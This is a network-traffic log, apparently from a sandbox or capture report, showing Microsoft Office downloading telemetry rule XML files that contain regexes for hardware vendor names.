2024-10-31 18:20:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:04 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 601805a2-a01e-000d-7265-2ad1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182004Z-17c5cb586f6f8m6jcqp9ufve6n00000000e00000000085bf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
111	192.168.2.4	51277	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:05 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:05 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 5fd3a61a-e01e-0071-0feb-2a08e7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182005Z-16849878b787bfsh7zgp804my400000008ng00000000qkns x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
112	192.168.2.4	51276	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:05 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:05 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: bf2855ec-b01e-0084-57b7-2ad736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182005Z-16849878b78tg5n42kspfr0x4800000009t000000000xv9z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
113	192.168.2.4	51280	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:05 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:05 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: b4871f28-d01e-00a1-686d-2b35b1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182005Z-17c5cb586f6f98jx9q4y7udcaw00000001e000000000ap5d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
114	192.168.2.4	51279	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:05 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:05 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182005Z-16849878b78j5kdg3dndgqw0vg0000000bmg00000000ek9g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.4	51278	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:05 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:05 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:05 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 862c7620-501e-0029-4f4f-29d0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182005Z-15b8d89586fnsf5zkvx8tfb0zc00000004xg00000000mwr6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:05 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	51281	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:06 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:06 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:06 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 283bb1f9-001e-0066-5cf3-2a561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182006Z-16849878b787bfsh7zgp804my400000008k000000000yy8k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-10-31 18:20:06 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	51282	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:06 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:06 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 4e15243a-401e-005b-2294-2a9c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182006Z-159b85dff8fx9jp8hC1DFWp25400000001wg000000005vc3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:07 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	51285	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:06 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:07 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:06 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: fa11464d-701e-0032-1f49-27a540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182006Z-16849878b78km6fmmkbenhx76n000000094g00000000vvp5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:07 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	51284	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:06 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:07 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:06 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 516b9b86-001e-0017-3b4b-2b0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182006Z-17c5cb586f69dpr98vcd9da8e800000001c0000000007b7r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:07 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	51283	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:06 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:07 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:06 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 46a88b53-101e-0017-7e74-2747c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182006Z-16849878b78wv88bk51myq5vxc0000000a5000000000h9a2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:07 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	51286	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:07 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:08 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:07 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 51984752-001e-0017-1f58-2b0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182007Z-17c5cb586f626sn8grcgm1gf8000000008ag00000000g0wx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:08 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" 